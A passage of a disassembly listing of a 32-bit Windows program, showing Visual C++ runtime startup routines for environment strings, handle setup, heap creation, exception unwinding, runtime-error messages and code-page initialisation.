loc_40313B: ; CODE XREF: sub_402F91+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_402F91 endp
; =============== S U B R O U T I N E =======================================
sub_403145 proc near ; CODE XREF: .text:0040295D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_4070B0
push ebx
push ebp
mov ebp, dword_4050A8
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_403193
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_403174
mov dword_4070B0, 1
jmp short loc_40319C
; ---------------------------------------------------------------------------
loc_403174: ; CODE XREF: sub_403145+21�j
call dword_4050AC ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz loc_40326E
mov dword_4070B0, 2
jmp loc_403222
; ---------------------------------------------------------------------------
loc_403193: ; CODE XREF: sub_403145+19�j
cmp eax, 1
jnz loc_40321D
loc_40319C: ; CODE XREF: sub_403145+2D�j
cmp esi, ebx
jnz short loc_4031AC
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz loc_40326E
loc_4031AC: ; CODE XREF: sub_403145+59�j
cmp [esi], bx
mov eax, esi
jz short loc_4031C1
loc_4031B3: ; CODE XREF: sub_403145+73�j
; sub_403145+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_4031B3
inc eax
inc eax
cmp [eax], bx
jnz short loc_4031B3
loc_4031C1: ; CODE XREF: sub_403145+6C�j
sub eax, esi
mov edi, dword_4050B0
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_403212
push ebp
call sub_403D56
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_403212
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_40320E
push [esp+18h+var_8]
call sub_403D27
pop ecx
mov [esp+18h+var_8], ebx
loc_40320E: ; CODE XREF: sub_403145+B9�j
mov ebx, [esp+18h+var_8]
loc_403212: ; CODE XREF: sub_403145+99�j
; sub_403145+A8�j
push esi
call dword_4050B4 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_403270
; ---------------------------------------------------------------------------
loc_40321D: ; CODE XREF: sub_403145+51�j
cmp eax, 2
jnz short loc_40326E
loc_403222: ; CODE XREF: sub_403145+49�j
cmp edi, ebx
jnz short loc_403232
call dword_4050AC ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz short loc_40326E
loc_403232: ; CODE XREF: sub_403145+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_403242
loc_403238: ; CODE XREF: sub_403145+F6�j
; sub_403145+FB�j
inc eax
cmp [eax], bl
jnz short loc_403238
inc eax
cmp [eax], bl
jnz short loc_403238
loc_403242: ; CODE XREF: sub_403145+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_403D56
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_403258
xor esi, esi
jmp short loc_403263
; ---------------------------------------------------------------------------
loc_403258: ; CODE XREF: sub_403145+10D�j
push ebp
push edi
push esi
call sub_402330
add esp, 0Ch
loc_403263: ; CODE XREF: sub_403145+111�j
push edi
call dword_4050D8 ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_403270
; ---------------------------------------------------------------------------
loc_40326E: ; CODE XREF: sub_403145+39�j
; sub_403145+61�j ...
xor eax, eax
loc_403270: ; CODE XREF: sub_403145+D6�j
; sub_403145+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_403145 endp
; =============== S U B R O U T I N E =======================================
sub_403277 proc near ; CODE XREF: .text:0040294D�p
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_403D56
mov esi, eax
pop ecx
test esi, esi
jnz short loc_403297
push 1Bh
call sub_4029D4
pop ecx
loc_403297: ; CODE XREF: sub_403277+16�j
mov dword_407360, esi
mov dword_407460, 20h
lea eax, [esi+100h]
loc_4032AD: ; CODE XREF: sub_403277+52�j
cmp esi, eax
jnb short loc_4032CB
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, dword_407360
add esi, 8
add eax, 100h
jmp short loc_4032AD
; ---------------------------------------------------------------------------
loc_4032CB: ; CODE XREF: sub_403277+38�j
lea eax, [esp+54h+var_44]
push eax
call dword_4050BC ; GetStartupInfoA
cmp word ptr [esp+54h+var_14+2], 0
jz loc_4033A7
mov eax, [esp+54h+var_10]
test eax, eax
jz loc_4033A7
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_403301
mov esi, eax
loc_403301: ; CODE XREF: sub_403277+86�j
cmp dword_407460, esi
jge short loc_40335B
mov edi, offset dword_407364
loc_40330E: ; CODE XREF: sub_403277+DA�j
push 100h
call sub_403D56
test eax, eax
pop ecx
jz short loc_403355
add dword_407460, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_40332C: ; CODE XREF: sub_403277+CF�j
cmp eax, ecx
jnb short loc_403348
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_40332C
; ---------------------------------------------------------------------------
loc_403348: ; CODE XREF: sub_403277+B7�j
add edi, 4
cmp dword_407460, esi
jl short loc_40330E
jmp short loc_40335B
; ---------------------------------------------------------------------------
loc_403355: ; CODE XREF: sub_403277+A4�j
mov esi, dword_407460
loc_40335B: ; CODE XREF: sub_403277+90�j
; sub_403277+DC�j
xor edi, edi
test esi, esi
jle short loc_4033A7
loc_403361: ; CODE XREF: sub_403277+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_40339E
mov cl, [ebp+0]
test cl, 1
jz short loc_40339E
test cl, 8
jnz short loc_403380
push eax
call dword_405094 ; GetFileType
test eax, eax
jz short loc_40339E
loc_403380: ; CODE XREF: sub_403277+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, dword_407360[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_40339E: ; CODE XREF: sub_403277+EF�j
; sub_403277+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_403361
loc_4033A7: ; CODE XREF: sub_403277+65�j
; sub_403277+71�j ...
xor ebx, ebx
loc_4033A9: ; CODE XREF: sub_403277+195�j
mov eax, dword_407360
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_403404
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_4033C4
push 0FFFFFFF6h
pop eax
jmp short loc_4033CE
; ---------------------------------------------------------------------------
loc_4033C4: ; CODE XREF: sub_403277+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_4033CE: ; CODE XREF: sub_403277+14B�j
push eax
call dword_4050A0 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4033F3
push edi
call dword_405094 ; GetFileType
test eax, eax
jz short loc_4033F3
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_4033F9
loc_4033F3: ; CODE XREF: sub_403277+163�j
; sub_403277+16E�j
or byte ptr [esi+4], 40h
jmp short loc_403408
; ---------------------------------------------------------------------------
loc_4033F9: ; CODE XREF: sub_403277+17A�j
cmp eax, 3
jnz short loc_403408
or byte ptr [esi+4], 8
jmp short loc_403408
; ---------------------------------------------------------------------------
loc_403404: ; CODE XREF: sub_403277+13E�j
or byte ptr [esi+4], 80h
loc_403408: ; CODE XREF: sub_403277+180�j
; sub_403277+185�j ...
inc ebx
cmp ebx, 3
jl short loc_4033A9
push dword_407460
call dword_4050A4 ; SetHandleCount
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_403277 endp
; =============== S U B R O U T I N E =======================================
sub_403422 proc near ; CODE XREF: .text:00402938�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
loc_40342A: ; DATA XREF: .rsrc:0040B19E�r
; .rsrc:loc_40B1B9�r ...
push 1000h
loc_40342F: ; DATA XREF: .rsrc:0040B0EE�r
; .rsrc:0040B10F�r ...
setz al
push eax
call dword_40508C ; HeapCreate
test eax, eax
mov dword_407348, eax
jz short loc_403457
call sub_403DCA
test eax, eax
jnz short loc_40345A
push dword_407348
call dword_405090 ; HeapDestroy
loc_403457: ; CODE XREF: sub_403422+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40345A: ; CODE XREF: sub_403422+27�j
push 1
pop eax
retn
sub_403422 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403460 proc near ; CODE XREF: sub_403558+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_403478
push [ebp+arg_0]
call sub_404D58 ; RtlUnwind
loc_403478: ; DATA XREF: sub_403460+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403460 endp
; =============== S U B R O U T I N E =======================================
sub_403480 proc near ; DATA XREF: sub_4034A2+A�o
; .text:00403513�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_4034A1
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_4034A1: ; CODE XREF: sub_403480+10�j
retn
sub_403480 endp
; =============== S U B R O U T I N E =======================================
sub_4034A2 proc near ; CODE XREF: sub_403558+67�p
; sub_403558+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_403480
push large dword ptr fs:0
mov large fs:0, esp
loc_4034BF: ; CODE XREF: sub_4034A2:loc_4034FA�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_4034FC
cmp esi, [esp+1Ch+arg_4]
jz short loc_4034FC
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_4034FA
push 101h
mov eax, [ebx+esi*4+8]
call sub_403536
call dword ptr [ebx+esi*4+8]
loc_4034FA: ; CODE XREF: sub_4034A2+44�j
jmp short loc_4034BF
; ---------------------------------------------------------------------------
loc_4034FC: ; CODE XREF: sub_4034A2+2A�j
; sub_4034A2+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_4034A2 endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_403480
jnz short locret_40352C
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40352C
mov eax, 1
locret_40352C: ; CODE XREF: .text:0040351A�j
; .text:00403525�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_406D9C
jmp short loc_403540
; =============== S U B R O U T I N E =======================================
sub_403536 proc near ; CODE XREF: sub_4034A2+4F�p
; sub_403558:loc_4035D0�p
push ebx
push ecx
mov ebx, offset dword_406D9C
mov ecx, [ebp+8]
loc_403540: ; CODE XREF: .text:00403534�j
; DATA XREF: sub_409A17+167�w ...
mov [ebx+8], ecx
mov [ebx+4], eax
loc_403546: ; DATA XREF: .rsrc:00409EE4�o
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_403536 endp
; ---------------------------------------------------------------------------
align 10h
dword_403550 dd 30324356h ; .rsrc:00409D10�r ...
; ---------------------------------------------------------------------------
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403558 proc near ; DATA XREF: .text:004028E8�o
; sub_4037BC+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
loc_403560: ; DATA XREF: sub_40B80D+9E�r
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
loc_403570: ; DATA XREF: sub_409B96:loc_409D7F�r
jnz loc_4035F8
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
loc_40357C: ; DATA XREF: sub_40B80D+7�r
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_40358B: ; CODE XREF: sub_403558:loc_4035E8�j
cmp esi, 0FFFFFFFFh
jz short loc_4035F1
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_4035DF
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
loc_4035A4: ; DATA XREF: sub_40A3CB+E�r
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_4035DF
js short loc_4035EA
mov edi, [ebx+8]
push ebx
call sub_403460
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_4034A2
loc_4035C4: ; DATA XREF: sub_40BD49+13�r
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
loc_4035D0: ; DATA XREF: sub_409B96+20F�r
call sub_403536
mov eax, [edi+ecx*4]
loc_4035D8: ; DATA XREF: sub_409B96+248�r
; sub_40A3CB+86�r
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_4035DF: ; CODE XREF: sub_403558+40�j
; sub_403558+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
loc_4035E8: ; DATA XREF: sub_409B96+239�r
; sub_40A3CB+75�r
jmp short loc_40358B
; ---------------------------------------------------------------------------
loc_4035EA: ; CODE XREF: sub_403558+54�j
mov eax, 0
jmp short loc_40360D
; ---------------------------------------------------------------------------
loc_4035F1: ; CODE XREF: sub_403558+36�j
mov eax, 1
jmp short loc_40360D
; ---------------------------------------------------------------------------
loc_4035F8: ; CODE XREF: sub_403558:loc_403570�j
; DATA XREF: sub_409B96+21D�r
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_4034A2
add esp, 8
pop ebp
mov eax, 1
loc_40360D: ; CODE XREF: sub_403558+97�j
; sub_403558+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403558 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_4034A2
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_403630 proc near ; CODE XREF: sub_4029D4+9�p
; sub_4029F9+9�p
mov eax, dword_406F58
cmp eax, 1
jz short loc_403647
test eax, eax
jnz short locret_403668
cmp dword_406AE4, 1
jnz short locret_403668
loc_403647: ; CODE XREF: sub_403630+8�j
push 0FCh
call sub_403669
mov eax, dword_4070B4
pop ecx
test eax, eax
jz short loc_40365D
call eax
loc_40365D: ; CODE XREF: sub_403630+29�j
push 0FFh
call sub_403669
pop ecx
locret_403668: ; CODE XREF: sub_403630+C�j
; sub_403630+15�j
retn
sub_403630 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403669 proc near ; CODE XREF: sub_4029D4+12�p
; sub_4029F9+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_406DB0
loc_40367C: ; CODE XREF: sub_403669+20�j
cmp edx, [eax]
jz short loc_40368B
add eax, 8
inc ecx
cmp eax, offset byte_406E40
jl short loc_40367C
loc_40368B: ; CODE XREF: sub_403669+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, dword_406DB0[esi]
jnz loc_4037B9
mov eax, dword_406F58
cmp eax, 1
jz loc_403793
test eax, eax
jnz short loc_4036BC
cmp dword_406AE4, 1
jz loc_403793
loc_4036BC: ; CODE XREF: sub_403669+44�j
cmp edx, 0FCh
jz loc_4037B9
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call dword_405034 ; GetModuleFileNameA
test eax, eax
jnz short loc_4036F3
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_4027C0
pop ecx
pop ecx
loc_4036F3: ; CODE XREF: sub_403669+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_4022B0
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_403736
lea eax, [ebp+var_1A4]
push eax
call sub_4022B0
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_4046A0
add esp, 10h
loc_403736: ; CODE XREF: sub_403669+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_4027C0
lea eax, [ebp+var_A0]
push edi
push eax
call sub_4027D0
lea eax, [ebp+var_A0]
push offset asc_405400 ; "\n\n"
push eax
call sub_4027D0
push off_406DB4[esi]
lea eax, [ebp+var_A0]
push eax
call sub_4027D0
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_404613
add esp, 2Ch
pop edi
jmp short loc_4037B9
; ---------------------------------------------------------------------------
loc_403793: ; CODE XREF: sub_403669+3C�j
; sub_403669+4D�j
lea eax, [ebp+arg_0]
lea esi, off_406DB4[esi]
push 0
push eax
push dword ptr [esi]
call sub_4022B0
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call dword_4050A0 ; GetStdHandle
push eax
call dword_40507C ; WriteFile
loc_4037B9: ; CODE XREF: sub_403669+2E�j
; sub_403669+59�j ...
pop esi
leave
retn
sub_403669 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037BC proc near ; CODE XREF: sub_402AEC+5E�p
; sub_403B86+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405440
push offset sub_403558
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_4070B8
xor ebx, ebx
cmp eax, ebx
jnz short loc_40382B
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_40543C
push esi
call dword_405070 ; GetStringTypeW
test eax, eax
jz short loc_403809
mov eax, esi
jmp short loc_403826
; ---------------------------------------------------------------------------
loc_403809: ; CODE XREF: sub_4037BC+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_406F48
push esi
push ebx
call dword_405074 ; GetStringTypeA
test eax, eax
jz loc_4038F1
push 2
pop eax
loc_403826: ; CODE XREF: sub_4037BC+4B�j
mov dword_4070B8, eax
loc_40382B: ; CODE XREF: sub_4037BC+2F�j
cmp eax, 2
jnz short loc_403854
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_40383C
mov eax, dword_4070D4
loc_40383C: ; CODE XREF: sub_4037BC+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call dword_405074 ; GetStringTypeA
jmp loc_4038F3
; ---------------------------------------------------------------------------
loc_403854: ; CODE XREF: sub_4037BC+72�j
cmp eax, 1
jnz loc_4038F1
cmp [ebp+arg_10], ebx
jnz short loc_40386A
mov eax, dword_4070E4
mov [ebp+arg_10], eax
loc_40386A: ; CODE XREF: sub_4037BC+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call dword_405078 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_4038F1
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_402670
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_402250
add esp, 0Ch
jmp short loc_4038C0
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_4038C0: ; CODE XREF: sub_4037BC+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_4038F1
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call dword_405078 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_4038F1
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call dword_405070 ; GetStringTypeW
jmp short loc_4038F3
; ---------------------------------------------------------------------------
loc_4038F1: ; CODE XREF: sub_4037BC+61�j
; sub_4037BC+9B�j ...
xor eax, eax
loc_4038F3: ; CODE XREF: sub_4037BC+93�j
; sub_4037BC+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4037BC endp
; =============== S U B R O U T I N E =======================================
sub_403905 proc near ; CODE XREF: sub_402DE7+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_403916
add esp, 0Ch
retn
sub_403905 endp
; =============== S U B R O U T I N E =======================================
sub_403916 proc near ; CODE XREF: sub_403905+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_407241[eax], cl
jnz short loc_403943
cmp [esp+arg_4], 0
jz short loc_40393C
movzx eax, word_406AFA[eax*2]
and eax, [esp+arg_4]
jmp short loc_40393E
; ---------------------------------------------------------------------------
loc_40393C: ; CODE XREF: sub_403916+16�j
xor eax, eax
loc_40393E: ; CODE XREF: sub_403916+24�j
test eax, eax
jnz short loc_403943
retn
; ---------------------------------------------------------------------------
loc_403943: ; CODE XREF: sub_403916+F�j
; sub_403916+2A�j
push 1
pop eax
retn
sub_403916 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403947 proc near ; CODE XREF: sub_403D0B+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_403AE0 ; GetOEMCP
mov esi, eax
loc_40395A: ; DATA XREF: sub_40B80D+51�r
; sub_40BD49+25�r
pop ecx
cmp esi, dword_407110
mov [ebp+arg_0], esi
jz loc_403AD4
loc_40396A: ; DATA XREF: sub_40B80D+88�w
; sub_40B924+36�r
xor ebx, ebx
cmp esi, ebx
loc_40396E: ; DATA XREF: sub_40B80D+AE�w
; sub_40BD49:loc_40BD62�r
jz loc_403ACA
xor edx, edx
loc_403976: ; DATA XREF: sub_40B8DF+3E�w
; sub_40BA03+121�r ...
mov eax, offset dword_406E48
loc_40397B: ; CODE XREF: sub_403947+41�j
cmp [eax], esi
jz short loc_4039F1
add eax, 30h
loc_403982: ; DATA XREF: .rsrc:0040B13E�w
; .rsrc:0040B4CB�r ...
inc edx
cmp eax, offset dword_406F38
jl short loc_40397B
loc_40398A: ; DATA XREF: .rsrc:0040B296�w
; .rsrc:0040B391�w ...
lea eax, [ebp+var_18]
push eax
loc_40398E: ; DATA XREF: sub_40AD58+20�w
; sub_40ADC7+6�w ...
push esi
call dword_40506C ; GetCPInfo
cmp eax, 1
jnz loc_403AC2
loc_40399E: ; DATA XREF: .rsrc:0040B06A�w
; .rsrc:0040B0B9�r
push 40h
xor eax, eax
loc_4039A2: ; DATA XREF: .rsrc:loc_40B1E4�w
; .rsrc:0040B5A1�r
pop ecx
mov edi, offset byte_407240
cmp [ebp+var_18], 1
mov dword_407110, esi
loc_4039B2: ; DATA XREF: sub_409B96+4B�r
rep stosd
stosb
mov dword_407344, ebx
jbe loc_403AB0
cmp [ebp+var_12], 0
jz loc_403A86
lea ecx, [ebp+var_11]
loc_4039CE: ; CODE XREF: sub_403947+139�j
mov dl, [ecx]
test dl, dl
jz loc_403A86
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_4039DF: ; CODE XREF: sub_403947+A8�j
cmp eax, edx
ja loc_403A7A
or byte_407241[eax], 4
inc eax
jmp short loc_4039DF
; ---------------------------------------------------------------------------
loc_4039F1: ; CODE XREF: sub_403947+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_407240
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_406E58[esi]
loc_403A0D: ; CODE XREF: sub_403947+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_403A40
loc_403A14: ; CODE XREF: sub_403947+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_403A40
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_403A39
mov edx, [ebp+var_4]
mov dl, byte_406E40[edx]
loc_403A2E: ; CODE XREF: sub_403947+F0�j
or byte_407241[eax], dl
inc eax
cmp eax, edi
jbe short loc_403A2E
loc_403A39: ; CODE XREF: sub_403947+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_403A14
loc_403A40: ; CODE XREF: sub_403947+CB�j
; sub_403947+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_403A0D
mov eax, [ebp+arg_0]
mov dword_40712C, 1
push eax
mov dword_407110, eax
call sub_403B2A
lea esi, dword_406E4C[esi]
mov edi, offset dword_407120
movsd
movsd
pop ecx
mov dword_407344, eax
movsd
jmp short loc_403ACF
; ---------------------------------------------------------------------------
loc_403A7A: ; CODE XREF: sub_403947+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_4039CE
loc_403A86: ; CODE XREF: sub_403947+7E�j
; sub_403947+8B�j
push 1
pop eax
loc_403A89: ; CODE XREF: sub_403947+14F�j
or byte_407241[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_403A89
push esi
call sub_403B2A
pop ecx
mov dword_407344, eax
mov dword_40712C, 1
jmp short loc_403AB6
; ---------------------------------------------------------------------------
loc_403AB0: ; CODE XREF: sub_403947+74�j
mov dword_40712C, ebx
loc_403AB6: ; CODE XREF: sub_403947+167�j
xor eax, eax
mov edi, offset dword_407120
stosd
stosd
stosd
jmp short loc_403ACF
; ---------------------------------------------------------------------------
loc_403AC2: ; CODE XREF: sub_403947+51�j
cmp dword_4070BC, ebx
jz short loc_403AD8
loc_403ACA: ; CODE XREF: sub_403947:loc_40396E�j
call sub_403B5D
loc_403ACF: ; CODE XREF: sub_403947+131�j
; sub_403947+179�j
call sub_403B86
loc_403AD4: ; CODE XREF: sub_403947+1D�j
xor eax, eax
jmp short loc_403ADB
; ---------------------------------------------------------------------------
loc_403AD8: ; CODE XREF: sub_403947+181�j
or eax, 0FFFFFFFFh
loc_403ADB: ; CODE XREF: sub_403947+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_403947 endp
; =============== S U B R O U T I N E =======================================
sub_403AE0 proc near ; CODE XREF: sub_403947+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword_4070BC, 0
cmp eax, 0FFFFFFFEh
jnz short loc_403B00
mov dword_4070BC, 1
jmp dword_405064
; ---------------------------------------------------------------------------
loc_403B00: ; CODE XREF: sub_403AE0+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_403B15
mov dword_4070BC, 1
jmp dword_405068
; ---------------------------------------------------------------------------
loc_403B15: ; CODE XREF: sub_403AE0+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_403B29
mov eax, dword_4070E4
mov dword_4070BC, 1
locret_403B29: ; CODE XREF: sub_403AE0+38�j
retn
sub_403AE0 endp
; =============== S U B R O U T I N E =======================================
sub_403B2A proc near ; CODE XREF: sub_403947+118�p
; sub_403947+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_403B57
sub eax, 4
jz short loc_403B51
sub eax, 0Dh
jz short loc_403B4B
dec eax
jz short loc_403B45
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_403B45: ; CODE XREF: sub_403B2A+16�j
mov eax, 404h
retn
